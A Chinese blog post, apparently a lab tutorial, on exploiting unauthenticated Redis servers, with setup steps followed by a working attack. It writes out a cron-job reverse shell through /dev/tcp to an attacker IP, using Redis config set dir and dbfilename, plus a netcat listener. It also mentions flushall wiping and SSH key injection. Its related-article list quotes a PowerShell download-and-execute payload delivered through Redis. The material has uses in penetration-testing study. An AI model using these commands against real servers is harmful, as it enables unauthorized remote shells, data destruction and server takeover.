Redis未授权访问漏洞利用

最新推荐文章于 2024-10-04 21:54:19 发布
最新推荐文章于 2024-10-04 21:54:19 发布
阅读量619 收藏 2
点赞数 1
分类专栏: 渗透 文章标签: redis 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53440207/article/details/129472802
版权

redis环境搭建

1.首先将我们所用到的文件上传到服务器并解压

在这里插入图片描述

2.进入redis文件夹 使用 make 命令编译 如果报错gcc未找到就使用yum命令安装一下gcc: yum -y install gcc

在这里插入图片描述

3.进入redis下的src文件夹 有redis.server证明安装成功 使./redis.service

启动redis
在这里插入图片描述

4.链接redis话再打开一个终端进入redis下src目录使用./redis.cli就可以进行链接

在这里插入图片描述

5.为了方便使用可以将redis-cli复制到/usr/local/bin目录下,这样就可以在任意位置使用redis-cli来连接

在这里插入图片描述

redis未授权访问漏洞

Redis因配置不当可以未授权访问。攻击者无需认证访问到内部数据可导致敏感信息泄露,也可以恶意执行flushall来清空所以数据。攻击者可通过eval执行LUA代码,或通过数据备份功能往磁盘写入后门文件如果redis以root身份运行可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。

1.当服务器安装完redis后没有设置密码这时候就存在redis未授权漏洞
我们可以使用另一台有reids服务器进行连接
示例:我们centos服务器是搭建了redis并且没设置密码,然后我们使用安装了redis服务的kali服务器进行连接

redis-cli -h 192.168.1.19 -p 6379

在这里插入图片描述

redis未授权漏洞利用

写入计划任务反弹shell

set x "\n* * * * * /bin/bash -i > /dev/tcp/192.168.1.9/6666 0<&1 2>&1\n"

以上命令就是写入计划任务反弹shell,ip设置为攻击机的ip 端口自定,每分钟执行一次。
config set dir /var/spool/cron/ 设置路径

config set dbfilename root  设置以root身份执行

save   保存

在这里插入图片描述以上完成后在攻击机开启一个监听 拿到权限可以控制服务器。

nv -lvp 6666

在这里插入图片描述

制冷少年的成长日记
关注
专栏目录
redis授权访问getshell
Jiajiajiang_的博客
08-02 5565
参考:https://blog.csdn.net/guxiaoguo/article/details/78913245 利用条件:linux,对方开启ssh 用到的工具:kali nmap redis 公司测试服务器:10.0.3.45 redis默认端口:6379 主要思路:利用redis授权访问命令给root账户写入SSH公钥文件,然后通过SSH登录服务器 ...
Redis授权访问漏洞引出的漏洞利用方式
Chu_Jian_Xiong的博客
11-20 1359
redis授权访问漏洞是一个由于redis服务版本较低其设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用。
Redis授权访问漏洞复现与工具安装
Welcome To Myon'Blog !
01-11 2465
redis是一个数据库,默认端口是6379,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器。Redis授权访问影响版本为5.0.5以下,可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令
redis授权漏洞利用总结
Echo__h的博客
09-09 907
redis默认端口6379,在默认配置情况下密码为空,因此如果将redis暴露到公网,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据,并且可以利用redis写入shell、写入SSH公钥等危险操作
Redis授权漏洞利用
tangshuangsss的专栏
01-04 643
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,...
Redis授权访问漏洞利用合集
weixin_57379923的博客
08-15 884
版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,经允许请勿转载!攻击机:IP:192.168.100.60。靶机:IP:192.168.100.40。作 者:PeiyuJue。设置 shell 反弹。
RedisExp 一款Redis综合漏洞利用工具,附下载链接。|漏洞探测|9月漏洞汇总
最新发布
分享渗透安全工具
10-04 554
RedisExp 是一个用于利用 Redis 漏洞的多功能工具,支持执行 Redis 命令、主从复制、DLL/SO 加载、文件上传、计划任务写入、SSH 公钥配置等操作。该工具允许用户通过不同的模块实现远程命令执行、上传恶意文件以及劫持 DLL。它适用于研究 Redis 安全漏洞,仅供合法的安全研究使用,不承担非法用途的责任。
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
渗透测试-Redis授权访问漏洞利用
cdyunaq的博客
12-24 1194
危害 信息泄露 系统信息 redis保存的信息 写文件GetShell 在Web目录中写入webshell 写入SSH公钥直接连接 写入计划任务(corntab)反弹shell 高级利用 主从复制getshell(4.x version < 5.0.5) 模块加载执行命令(> 4.x) 环境准备 机型 ip 服务 版本 攻击机
Redis授权访问漏洞
周星星的博客
08-22 1563
Redis授权访问漏洞复现以及利用
redis漏洞利用
爱测未来团队博客
07-06 9693
前言       说起来redis的安全问题被大众关注也有一些时间了,但是日常生活中还是有很多运维人员不知道redis如何配置会比较安全,一部分安全测试人员对这个漏洞利用不是很熟悉,所以就有了这篇文章。在此之前我第一次遇到这个问题的时候也百度很多前辈的文章看了一下,但是还是觉得过程很繁琐,操作起来不是很方便。我自己就搭建了一个环境做了一次漏洞复现实验,这里把过程记录下来分享给大家,希望安全人员以后...
redis4.0x5.0x-远程命令漏洞利用exp.rar
07-09
redis4.0x5.0x-远程命令漏洞利用exp 2019年7月9日版,仅用来学习测试,不可用于非法用途,谢谢配合,实测可用
windows环境redis授权利用手法总结
2401_84466336的博客
05-29 1493
redis 目标ip:6379>set x "/r/n/r/npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://csip:80/a'))\"/r/n/r/n。也就是说在`c:/windows/system32/wbem/mof/`目录下的mof文件会每5秒自动执行一次,这样就不需要重启机器就能获取权限了。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
redis授权访问漏洞(三种方法)
网安小白的博客
08-30 5859
redis授权访问复现,含写入webshell、linux计划任务反弹shell、写入ssh公钥实现ssh登录三种方法~
redis授权访问漏洞利用+redis日志分析
ChenD的学习笔记
05-22 1577
下载: wget http://download.redis.io/releases/redis-2.8.17.tar.gz。将redis-server复制到/usr/bin目录下:cp redis-server /usr/bin/将只允许本地连接注释掉,保护模式关掉,然后保存一下,再启动redis服务,再使用kali连接一下。将redis-cli复制到/usr/bin目录下:cp redis-cli /usr/bin/将redis-server 移动到/usr/bin/
Redis授权访问漏洞复现及利用
Lilin's博客
03-20 983
Redis授权访问漏洞复现及利用Redis相关介绍应用场景常用语法漏洞复现环境搭建Centos 7 环境配置安装Apache安装PHP安装Redis漏洞利用准备kali安装Rediswindows安装Redis授权访问漏洞利用webshell反弹shell写公钥主从复制RCE预防措施其他问题 Redis相关介绍 Redis是完全开源的,遵守BSD协议,是一个高性能的key-value数据库。 应用场景 在Java web中主要有两个应用场景: 存储、缓存用的数据 需要高速读写的场合使用它快速读写 常
Redis漏洞大全~讲解最全的漏洞利用方法
weixin_67832625的博客
08-11 1279
Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。漏洞原理。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

制冷少年的成长日记

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值